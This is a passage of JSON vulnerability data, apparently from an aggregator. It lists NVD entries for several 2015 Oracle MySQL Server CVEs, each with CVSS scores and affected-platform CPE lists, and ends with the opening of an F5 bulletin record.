"cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2015-4836", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4836", "cvss": {"score": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.6.26:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:04", "description": "Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition, a different vulnerability than CVE-2015-4802.", "edition": 6, "cvss3": {}, "published": "2015-10-21T21:59:00", "title": "CVE-2015-4792", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.2, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:N/AC:H/Au:M/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "MULTIPLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4792"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/a:oracle:mysql:5.6.26", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:mysql:5.5.45", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:oracle:linux:7", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2015-4792", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4792", "cvss": {"score": 1.7, "vector": "AV:N/AC:H/Au:M/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.6.26:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:04", "description": "Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server : Security : Privileges.", "edition": 5, "cvss3": {}, "published": "2015-10-21T21:59:00", "title": "CVE-2015-4830", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4830"], "modified": "2019-02-11T18:45:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/a:oracle:mysql:5.6.26", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/a:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:mysql:5.5.45", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2015-4830", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4830", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.6.26:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:04", "description": "Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect confidentiality via unknown vectors related to Server : Types.", "edition": 5, "cvss3": {}, "published": "2015-10-21T21:59:00", "title": "CVE-2015-4826", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4826"], "modified": "2019-02-11T18:48:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/a:oracle:mysql:5.6.26", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:mysql:5.5.45", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2015-4826", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4826", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.6.26:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:04", "description": "Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition, a different vulnerability than CVE-2015-4792.", "edition": 6, "cvss3": {}, "published": "2015-10-21T21:59:00", "title": "CVE-2015-4802", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4802"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/a:oracle:mysql:5.6.26", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:mysql:5.5.45", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:oracle:linux:7", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2015-4802", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4802", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.6.26:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:04", "description": "Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier, when running on Windows, allows remote authenticated users to affect availability via unknown vectors related to Server : Query Cache.\n<a href=\"http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\" rel=\"nofollow\">\"This issue impacts the Windows platform only.\"</a>", "edition": 5, "cvss3": {}, "published": "2015-10-21T21:59:00", "title": "CVE-2015-4807", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4807"], "modified": "2019-02-11T19:19:00", "cpe": ["cpe:/a:oracle:mysql:5.6.26", "cpe:/o:opensuse:leap:42.1", "cpe:/a:oracle:mysql:5.5.45", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2015-4807", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4807", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:mysql:5.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.6.26:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:04", "description": "Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via vectors related to DML, a different vulnerability than CVE-2015-4913.", "edition": 6, "cvss3": {}, "published": "2015-10-21T23:59:00", "title": "CVE-2015-4858", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4858"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/a:oracle:mysql:5.6.26", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:mysql:5.5.45", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:oracle:linux:7", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2015-4858", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4858", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.6.26:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:04", "description": "Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : Parser.", "edition": 6, "cvss3": {}, "published": "2015-10-21T23:59:00", "title": "CVE-2015-4870", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4870"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/a:oracle:mysql:5.6.26", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:mysql:5.5.45", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:oracle:linux:7", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2015-4870", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4870", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.6.26:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:04", "description": "Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect availability via vectors related to Server : DDL.", "edition": 6, "cvss3": {}, "published": "2015-10-21T21:59:00", "title": "CVE-2015-4815", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4815"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/a:oracle:mysql:5.6.26", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:mysql:5.5.45", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:oracle:linux:7", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2015-4815", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4815", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.6.26:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2017-07-06T10:21:41", "bulletinFamily": "software", "cvelist": ["CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4864", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4800", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4833", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826", "CVE-2015-4862", "CVE-2015-4890"], "edition": 1, "description": "\nF5 Product 